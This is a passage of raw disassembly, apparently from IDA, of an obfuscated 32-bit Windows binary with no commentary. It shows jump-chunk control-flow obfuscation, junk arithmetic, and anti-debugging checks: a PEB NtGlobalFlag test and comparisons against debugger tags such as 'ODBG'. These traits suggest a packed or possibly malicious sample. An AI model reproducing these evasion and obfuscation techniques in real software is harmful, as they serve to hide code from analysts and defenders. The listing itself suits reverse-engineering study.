cmp eax, 0FFFFFFFFh
push offset loc_424933
jmp nullsub_117
sub_42A919 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_42A930: ; CODE XREF: sub_42284F+4AB3�j
jnz loc_4296E2
jmp loc_428E91
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_42A93B: ; CODE XREF: sub_423324:loc_427B91�j
cmp dword ptr [eax], 4742444Fh
jz loc_42A566
loc_42A947: ; CODE XREF: sub_423324:loc_421D04�j
jmp loc_425077
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_42A94C: ; CODE XREF: sub_4294B3:loc_42BEC6�j
cmp dword ptr [ebp-4], 1
jnz loc_425077
jmp loc_42583C
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422FDC
loc_42A95B: ; CODE XREF: sub_422FDC+1695�j
jnz loc_423B68
mov eax, 6
sub eax, [ebp-0Ch]
mov [ebp-0Ch], eax
jmp loc_4266AF
; ---------------------------------------------------------------------------
loc_42A971: ; CODE XREF: sub_422FDC:loc_424667�j
cmp dword ptr [ebp-1Ch], 66h
jmp loc_426E7C
; END OF FUNCTION CHUNK FOR sub_422FDC
; ---------------------------------------------------------------------------
mov ebx, [edi]
ror edi, 4
jmp sub_426985
; ---------------------------------------------------------------------------
loc_42A984: ; CODE XREF: _94j21ax3:loc_4295A6�j
pop ebx
; START OF FUNCTION CHUNK FOR sub_4259BF
loc_42A985: ; CODE XREF: sub_4259BF+5156�j
xor ebx, 0B021744Ch
xchg ebx, [esp+0]
xor dword ptr [esp+0], 6CC37E8Ch
push 4
loc_42A997: ; CODE XREF: _94j21ax3:loc_42B472�j
lea eax, [ebp-10h]
push eax
push 639293AAh
jmp loc_42185A
; END OF FUNCTION CHUNK FOR sub_4259BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4281A5
loc_42A9A5: ; CODE XREF: sub_4281A5+17BA�j
and ebp, 8E276A12h
mov [esi], eax
jmp loc_427797
; END OF FUNCTION CHUNK FOR sub_4281A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422973
loc_42A9B2: ; CODE XREF: sub_422973+E�j
call sub_428B74
sub eax, ds:dword_42C208
shr eax, 11h
jz loc_425210
jmp loc_426431
; END OF FUNCTION CHUNK FOR sub_422973
; ---------------------------------------------------------------------------
loc_42A9CB: ; CODE XREF: _94j21ax3:00422A95�j
jnz loc_421422
jmp loc_42727D
; ---------------------------------------------------------------------------
loc_42A9D6: ; CODE XREF: _94j21ax3:0042A764�j
; _94j21ax3:0042B91B�j
xor ebp, esi
; =============== S U B R O U T I N E =======================================
sub_42A9D8 proc near ; CODE XREF: sub_42A2B1-8017�p
; FUNCTION CHUNK AT 0042713E SIZE 00000006 BYTES
mov [esp+0], esi
pop esi
add esi, 4982ED09h
jmp loc_42713E
sub_42A9D8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42A9E7 proc near ; CODE XREF: sub_422C48�p
; _94j21ax3:0042C120�j
; FUNCTION CHUNK AT 00427A8F SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00427FED SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00429CA9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B9DC SIZE 00000007 BYTES
xchg ebx, [esp+0]
pop ebx
push ebp
mov ebp, esp
push ecx
jmp loc_427A8F
sub_42A9E7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42A9F4 proc near ; DATA XREF: sub_42266A:loc_428E3E�o
xchg ecx, [esp+0]
jmp sub_4239A5
sub_42A9F4 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_47. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_42A9FD: ; CODE XREF: sub_4294B3+2A1E�j
jmp nullsub_177
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1AE
loc_42AA02: ; CODE XREF: sub_42C1AE-3A29�j
jmp loc_427B70
; END OF FUNCTION CHUNK FOR sub_42C1AE
; =============== S U B R O U T I N E =======================================
sub_42AA07 proc near ; CODE XREF: sub_4258EB+3FD6�p
; sub_4258EB:loc_4299C0�p
; FUNCTION CHUNK AT 00421A9A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042326E SIZE 0000000A BYTES
mov eax, cs
xor al, al
or eax, eax
jnz loc_42656F
jmp loc_42326E
sub_42AA07 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B202
loc_42AA18: ; CODE XREF: sub_42B202:loc_428D33�j
xchg edi, [esp+0]
jmp loc_424A5F
; END OF FUNCTION CHUNK FOR sub_42B202
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_132. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_42AA21: ; CODE XREF: sub_422EB0+8DDE�j
jmp loc_424E17
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_42AA26: ; CODE XREF: sub_42484C+2B1A�j
jmp loc_42955B
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BB0D
loc_42AA2B: ; CODE XREF: sub_42BB0D-A737�j
jmp nullsub_173
; END OF FUNCTION CHUNK FOR sub_42BB0D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_51. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429280
loc_42AA31: ; CODE XREF: sub_429280+28E6�j
pop edx
pop eax
pop ebx
xchg edi, [esp+0]
mov ecx, edi
jmp loc_429B5A
; END OF FUNCTION CHUNK FOR sub_429280
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_42AA3E: ; CODE XREF: sub_423324+3D36�j
sbb ebx, edi
sbb ebp, edi
or ebp, esi
loc_42AA44: ; CODE XREF: sub_42BC39:loc_425460�j
push offset sub_4226AE
jmp nullsub_120
; END OF FUNCTION CHUNK FOR sub_423324
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_105. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421558
loc_42AA50: ; CODE XREF: sub_421558+824B�j
jmp nullsub_205
; END OF FUNCTION CHUNK FOR sub_421558
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423614
loc_42AA55: ; CODE XREF: sub_423614-618�j
jmp loc_421083
; END OF FUNCTION CHUNK FOR sub_423614
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B238
loc_42AA5A: ; CODE XREF: sub_42B238-87B7�j
jmp loc_4294FA
; END OF FUNCTION CHUNK FOR sub_42B238
; =============== S U B R O U T I N E =======================================
sub_42AA5F proc near ; CODE XREF: sub_42A81A+C�p
; sub_42191F+A332�p
; FUNCTION CHUNK AT 0042153A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004215EA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423CD2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004240D4 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004248C3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004251DE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425A03 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00426D62 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426F5E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004285ED SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004286A0 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00429B29 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0042A38F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042A3E2 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042B291 SIZE 00000008 BYTES
jo sub_42106D
push ebp
mov ebp, esp
jmp loc_4251DE
sub_42AA5F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ABB1
loc_42AA6D: ; CODE XREF: sub_42ABB1:loc_428313�j
push eax
push offset loc_424631
jmp loc_4280B7
; END OF FUNCTION CHUNK FOR sub_42ABB1
; =============== S U B R O U T I N E =======================================
sub_42AA78 proc near ; CODE XREF: _94j21ax3:004234B9�j
; sub_42983E�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00424A79 SIZE 00000013 BYTES
xchg ebx, [esp+0]
pop ebx
push ebx
push ecx
call sub_42C473
mov esp, [esp+4+arg_0]
jmp loc_424A79
sub_42AA78 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_42AA8C: ; CODE XREF: sub_422EB0-1023�j
jnz loc_4272F8
jmp loc_422E74
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
loc_42AA97: ; CODE XREF: _94j21ax3:00424C83�j
shl eax, 0Fh
add [ebp-8], eax
mov eax, [ebp-8]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C03F
loc_42AAA4: ; CODE XREF: sub_42C03F+13�j
jmp loc_42B1CF
; END OF FUNCTION CHUNK FOR sub_42C03F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_42AAA9: ; CODE XREF: sub_42A0CC-7D5�j
or ebx, 57929FC0h
add ebx, 0A8690041h
test eax, ebx
pop ebx
jz loc_423AB6
jmp loc_4246A4
; END OF FUNCTION CHUNK FOR sub_42A0CC
; =============== S U B R O U T I N E =======================================
sub_42AAC3 proc near ; DATA XREF: sub_423324:loc_423402�o
mov eax, [ebp-0Ch]
push offset sub_42472B
jmp nullsub_156
sub_42AAC3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A268
loc_42AAD0: ; CODE XREF: sub_42A268+A�j
jz loc_4283CD
jmp loc_42435F
; END OF FUNCTION CHUNK FOR sub_42A268
; =============== S U B R O U T I N E =======================================
sub_42AADB proc near ; CODE XREF: sub_429862-7B4C�p
; _94j21ax3:00427F84�j
; FUNCTION CHUNK AT 0042720D SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00429F2D SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
pop ebp
mov eax, ds:dword_4219AC
or eax, eax
jnz loc_429F2D
jmp loc_42720D
sub_42AADB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4221B8
loc_42AAF3: ; CODE XREF: sub_4221B8+1FBD�j
cmp eax, 5E930A8h
jmp loc_427F89
; END OF FUNCTION CHUNK FOR sub_4221B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426716
loc_42AAFE: ; CODE XREF: sub_426716-288D�j
call sub_4290C0
; END OF FUNCTION CHUNK FOR sub_426716
; START OF FUNCTION CHUNK FOR sub_4289CF
loc_42AB03: ; CODE XREF: sub_4289CF+3�j
mov [ebp-8], eax
push offset sub_4294E3
jmp loc_423393
; END OF FUNCTION CHUNK FOR sub_4289CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4259BF
loc_42AB10: ; CODE XREF: sub_4259BF+259B�j
xor edx, eax
shr ecx, 11h
jnz loc_42A985
add ecx, 1FBA25DAh
loc_42AB21: ; CODE XREF: sub_421D33:loc_42783E�j
call sub_426612
call sub_42269A
; END OF FUNCTION CHUNK FOR sub_4259BF
; START OF FUNCTION CHUNK FOR sub_422790
loc_42AB2B: ; CODE XREF: sub_422790+C�j
jmp loc_421980
; END OF FUNCTION CHUNK FOR sub_422790
; =============== S U B R O U T I N E =======================================
sub_42AB30 proc near ; CODE XREF: sub_42936F+3�p
; FUNCTION CHUNK AT 00424768 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00424D75 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00425122 SIZE 00000005 BYTES
xchg ecx, [esp+0]
mov ecx, [esp+0]
mov esp, ebp
pop ebp
mov eax, ds:dword_423434
jmp loc_424D75
sub_42AB30 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427FF5
loc_42AB44: ; CODE XREF: sub_427FF5+E�j
xchg edi, [esp-4+arg_0]
retn
; END OF FUNCTION CHUNK FOR sub_427FF5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_42AB48: ; CODE XREF: sub_42284F+D31�j
jmp nullsub_127
; END OF FUNCTION CHUNK FOR sub_42284F
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_10. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C057
loc_42AB50: ; CODE XREF: sub_42875C+8�j
; sub_42C057-23�j ...
mov edx, [esp+0]
jmp loc_4265B7
; END OF FUNCTION CHUNK FOR sub_42C057
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_42AB58: ; CODE XREF: sub_42A0CC-6BF3�j
mov eax, large fs:30h
mov eax, [eax+68h]
test eax, 70h
jz loc_4298E4
jmp loc_4274BA
; END OF FUNCTION CHUNK FOR sub_42A0CC
; =============== S U B R O U T I N E =======================================
sub_42AB72 proc near ; CODE XREF: _94j21ax3:00421D9F�j
; sub_4294B3:loc_42751A�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004272BE SIZE 00000005 BYTES
mov [esp+0], esi
pop esi
xchg eax, [esp-4+arg_0]
jmp loc_4272BE
sub_42AB72 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42AB7E: ; CODE XREF: _94j21ax3:loc_421FD9�j
pop esi
jp loc_42598E
loc_42AB85: ; CODE XREF: _94j21ax3:loc_421730�j
call sub_4239F1
; START OF FUNCTION CHUNK FOR sub_42B4F1
loc_42AB8A: ; CODE XREF: sub_42B4F1+A�j
push eax
push offset sub_4295ED
jmp nullsub_214
; END OF FUNCTION CHUNK FOR sub_42B4F1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_42AB95: ; CODE XREF: sub_42284F-3A7�j
push 4AD10CCFh
loc_42AB9A: ; CODE XREF: sub_42284F:loc_42A165�j
lea eax, [ebp-25Ch]
cmp dword ptr [eax], 47424454h
jnz loc_427BB3
jmp loc_425784
; END OF FUNCTION CHUNK FOR sub_42284F
; =============== S U B R O U T I N E =======================================
sub_42ABB1 proc near ; CODE XREF: sub_42972F:loc_42204E�p
; _94j21ax3:00429AF3�j
; FUNCTION CHUNK AT 004280B7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004282F7 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00428F87 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AA6D SIZE 0000000B BYTES
mov [esp+0], edx
pop edx
push 59E2E4Dh
pop edi
add edi, 9533D38Bh
jmp loc_428F87
sub_42ABB1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B079
loc_42ABC6: ; CODE XREF: sub_42B079:loc_42B07E�j
mov [ebp-4], eax
jmp loc_42C414
; END OF FUNCTION CHUNK FOR sub_42B079
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42ABCE proc near ; CODE XREF: sub_426C7A-2B64�p
; sub_426C7A+26B�p
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004269AC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004270CF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00429AF8 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0042C49C SIZE 00000005 BYTES
push ebp
loc_42ABCF: ; CODE XREF: _94j21ax3:0042B12F�j
mov ebp, esp
add esp, 0FFFFFFD8h
jmp loc_4269AC
sub_42ABCE endp
; =============== S U B R O U T I N E =======================================
sub_42ABD9 proc near ; DATA XREF: sub_428694-1A26�o
; FUNCTION CHUNK AT 00426CC5 SIZE 00000005 BYTES
xchg ecx, [esp+0]
jmp loc_426CC5
sub_42ABD9 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427D53
loc_42ABE1: ; CODE XREF: sub_427D53:loc_42189C�j
or eax, eax
jnz loc_423832
call sub_42574E
mov edx, 0C90D1845h
jmp loc_42434A
; END OF FUNCTION CHUNK FOR sub_427D53
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_42ABF8: ; CODE XREF: sub_42C0BC:loc_423F75�j
xor edx, 9B785B09h
cmp edx, 53115CB8h
jmp loc_424637
; END OF FUNCTION CHUNK FOR sub_42C0BC
; ---------------------------------------------------------------------------
push 0E6EC9EB1h
ror eax, 0Ah
jmp sub_42269A
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_42AC17 proc near ; CODE XREF: sub_42484C:loc_427082�j
; sub_4292D7+4�p
; FUNCTION CHUNK AT 00421276 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423E24 SIZE 0000000A BYTES
jnz loc_423E24
call sub_42A0CC
push ecx
call sub_42559A
loc_42AC28: ; CODE XREF: sub_42220B+5D65�j
jmp sub_42875C
sub_42AC17 endp
; =============== S U B R O U T I N E =======================================
sub_42AC2D proc near ; DATA XREF: sub_4238D1-221F�o
; FUNCTION CHUNK AT 00421A87 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00423A7D SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042657A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042911D SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0042BCA4 SIZE 00000007 BYTES
or ecx, ecx
jz loc_42AC48
mov edx, [ebx+ecx]
loc_42AC38: ; CODE XREF: sub_428418+19�j
xor edx, [ebx+ecx+4]
cmp edx, 7C61090Eh
jz loc_427DA3
loc_42AC48: ; CODE XREF: sub_425983+226D�j
; sub_428418+4�j ...
jno loc_42BCA4
or eax, eax
jmp loc_42657A
sub_42AC2D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42AC55: ; CODE XREF: _94j21ax3:loc_427413�j
shl ecx, 4
ror ebx, 1Fh
push 5B56908Dh
; START OF FUNCTION CHUNK FOR sub_428BBD
loc_42AC60: ; CODE XREF: sub_428BBD:loc_42168F�j
cmp esi, 0A778BA90h
jmp loc_42AC9D
; END OF FUNCTION CHUNK FOR sub_428BBD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_42AC6B: ; CODE XREF: sub_42220B:loc_427F5F�j
; sub_423F55+59F8�j
jge loc_42B10A
; END OF FUNCTION CHUNK FOR sub_423F55
; START OF FUNCTION CHUNK FOR sub_4221B8
loc_42AC71: ; CODE XREF: sub_4221B8+A�j
jmp loc_42AF73
; END OF FUNCTION CHUNK FOR sub_4221B8
; ---------------------------------------------------------------------------
mov ebx, 76E2AA6Fh
jl loc_42BC67
jmp loc_42B108
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_24. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_42AC87: ; CODE XREF: sub_42169F+2D2D�j
jz loc_42912F
loc_42AC8D: ; CODE XREF: _94j21ax3:0042A08D�j
jmp nullsub_131
; END OF FUNCTION CHUNK FOR sub_42169F
; ---------------------------------------------------------------------------
jnp loc_421C14
jmp loc_42912C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428BBD
loc_42AC9D: ; CODE XREF: sub_428BBD+20A9�j
js loc_421042
loc_42ACA3: ; CODE XREF: _94j21ax3:loc_4264A3�j
push eax
push 0B4E3C17Bh
pop eax
add eax, 79399D40h
test eax, 400000h
jmp loc_42308D
; END OF FUNCTION CHUNK FOR sub_428BBD
; =============== S U B R O U T I N E =======================================
sub_42ACBB proc near ; DATA XREF: sub_424475+9�o
mov edx, 0CF0182F6h
call sub_422048
mov ds:dword_42C4A4, eax
sub_42ACBB endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42780F
loc_42ACCA: ; CODE XREF: sub_42780F:loc_424570�j
; sub_42780F+11�j ...
mov eax, ds:dword_42C4A4
call sub_423F43
jmp loc_42818F
; END OF FUNCTION CHUNK FOR sub_42780F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B856
loc_42ACD9: ; CODE XREF: sub_42B856:loc_422B44�j
; sub_42B856-630F�j
mov ecx, [ebp-1Ch]
and ecx, 7
mov eax, 1
shl eax, cl
mov edx, [ebp-1Ch]
shr edx, 3
mov ecx, ds:dword_429F74
jmp loc_428C6A
; END OF FUNCTION CHUNK FOR sub_42B856
; ---------------------------------------------------------------------------
loc_42ACF7: ; DATA XREF: sub_426B3C�o
js loc_42A6EF
pushf
call sub_42B772
; START OF FUNCTION CHUNK FOR sub_421656
loc_42AD03: ; CODE XREF: sub_421656:loc_42ADE3�j
mov ds:byte_426F58, 1
lea eax, [ebp-14h]
xor edx, edx
push offset sub_428463
jmp nullsub_132
; END OF FUNCTION CHUNK FOR sub_421656
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42134B
loc_42AD19: ; CODE XREF: sub_42134B+7F80�j
pop esi
rol esi, 0Ch
xor esi, 2CBDCF33h
add esi, ebp
loc_42AD25: ; CODE XREF: sub_428BBD:loc_4235EA�j
add esi, 81447FD0h
mov [esi], eax
pop esi
jmp loc_42742B
; END OF FUNCTION CHUNK FOR sub_42134B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4238D1
loc_42AD33: ; CODE XREF: sub_4238D1+E�j
jp loc_42B808
jp loc_4216AE
jmp sub_4232B6
; END OF FUNCTION CHUNK FOR sub_4238D1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422CA6
loc_42AD44: ; CODE XREF: sub_422CA6:loc_4259CA�j
; sub_422CA6+6685�j
call sub_422750
; END OF FUNCTION CHUNK FOR sub_422CA6
; START OF FUNCTION CHUNK FOR sub_428993
loc_42AD49: ; CODE XREF: sub_428993:loc_42511D�j
push edi
loc_42AD4A: ; CODE XREF: sub_42AC2D-71AC�j
push 904C8C5h
pop edi
and edi, 53E7EC4h
xor edi, 0E5DC066Ch
jmp loc_428D38
; END OF FUNCTION CHUNK FOR sub_428993
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B358
loc_42AD61: ; CODE XREF: sub_42B358:loc_424E88�j
push 3FF175CAh
pop edx
add edx, 0C6D4EADh
add edx, ebp
jmp loc_421F86
; END OF FUNCTION CHUNK FOR sub_42B358
; ---------------------------------------------------------------------------
cmp ebx, edi
jmp loc_42B472
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428BBD
loc_42AD7B: ; CODE XREF: sub_428BBD:loc_424E64�j
lea eax, sub_4228FF
mov [ecx+0B8h], eax
xchg ebp, [esp+0]
mov ecx, ebp
jmp loc_429E6F
; END OF FUNCTION CHUNK FOR sub_428BBD
; =============== S U B R O U T I N E =======================================
sub_42AD91 proc near ; CODE XREF: sub_42983E:loc_424335�p
; sub_423A56:loc_4289AE�j
mov [esp+0], ebx
pop ebx
add ecx, 0BDD4DBF6h
call sub_4240C3
loc_42ADA0: ; CODE XREF: _94j21ax3:0042A17D�j
mov [edx], esi
sub_42AD91 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42ADA2 proc near ; CODE XREF: sub_42484C+2B2C�p
; _94j21ax3:loc_42A314�j
; FUNCTION CHUNK AT 00424B31 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00425B8C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00426C46 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004278E1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A19F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B9F9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042BB45 SIZE 0000000B BYTES
mov [esp+0], esi
pop esi
push eax
call sub_429550
loc_42ADAC: ; CODE XREF: _94j21ax3:0042418F�j
jmp loc_424B31
sub_42ADA2 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421F28
loc_42ADB1: ; CODE XREF: sub_421F28:loc_42BCAB�j
test ebp, 61CB790Dh
jmp loc_427905
; END OF FUNCTION CHUNK FOR sub_421F28
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424627
loc_42ADBC: ; CODE XREF: sub_424627+5�j
xchg ebx, eax
push edx
or eax, 2AA9EA33h
cmp eax, ebx
cmp ebx, eax
not eax
jns loc_42926B
jmp loc_428B54
; END OF FUNCTION CHUNK FOR sub_424627
; =============== S U B R O U T I N E =======================================
sub_42ADD6 proc near ; CODE XREF: _94j21ax3:004278EF�p
mov [esp+0], eax
ror eax, 0Dh
mov ds:dword_424090, eax
sub_42ADD6 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_14. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421656
loc_42ADE3: ; CODE XREF: sub_421656+449F�j
jmp loc_42AD03
; END OF FUNCTION CHUNK FOR sub_421656
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42454E
loc_42ADE8: ; CODE XREF: sub_42454E+D�j
; sub_4276A3+6�j
rol eax, 0Dh
push eax
jmp loc_428437
; END OF FUNCTION CHUNK FOR sub_42454E
; ---------------------------------------------------------------------------
adc ebp, ecx
jmp sub_4290C0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_42ADF8: ; CODE XREF: sub_42284F:loc_42BD2B�j
jz loc_421F75
jmp loc_42397F
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423C3E
loc_42AE03: ; CODE XREF: sub_423C3E+E�j
jz loc_4226F8
jmp loc_427144
; END OF FUNCTION CHUNK FOR sub_423C3E
; ---------------------------------------------------------------------------
shl ebp, 0Bh
jmp loc_429DE7
; ---------------------------------------------------------------------------
locret_42AE16: ; CODE XREF: _94j21ax3:loc_421FBA�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_42AE17: ; CODE XREF: sub_422EB0+644E�j
jmp loc_42B221
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
loc_42AE1C: ; CODE XREF: _94j21ax3:004265E5�j
jmp loc_427441
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A791
loc_42AE21: ; CODE XREF: sub_42A791:loc_42378A�j
call sub_423BBD
loc_42AE26: ; CODE XREF: sub_42B478:loc_429A2A�j
xor edx, 40132F8Eh
add edx, 0D9AB5872h
xchg edx, [esp-4+arg_0]
jmp sub_42A61F
; END OF FUNCTION CHUNK FOR sub_42A791
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_42AE3A: ; CODE XREF: sub_422EB0+5A99�j
jnz loc_4272F8
jmp loc_42BF64
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421A4F
loc_42AE45: ; CODE XREF: sub_421A4F+4�j
; sub_428EBB-6BCC�j ...
mov eax, [ebp-4]
mov [ebp-8], eax
mov eax, [ebp-8]
loc_42AE4E: ; CODE XREF: _94j21ax3:loc_42327E�j
mov esp, ebp
push offset loc_42AEF3
jmp nullsub_135
; END OF FUNCTION CHUNK FOR sub_421A4F
; =============== S U B R O U T I N E =======================================
sub_42AE5A proc near ; DATA XREF: sub_42763B+5�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00421154 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00421C93 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00422347 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00422653 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042536A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00425FD4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427A55 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00428FE7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004291E7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429478 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B68F SIZE 0000000A BYTES
jns loc_42B68F
xor ebx, edx
shl eax, 4
push edx
push 5A27CC35h
pop edx
xor edx, 3621E891h
jmp loc_422653
sub_42AE5A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4247A2
loc_42AE77: ; CODE XREF: sub_4247A2+9�j
push ecx
mov esp, ebp
pop ebp
mov eax, ds:dword_429F80
or eax, eax
; END OF FUNCTION CHUNK FOR sub_4247A2
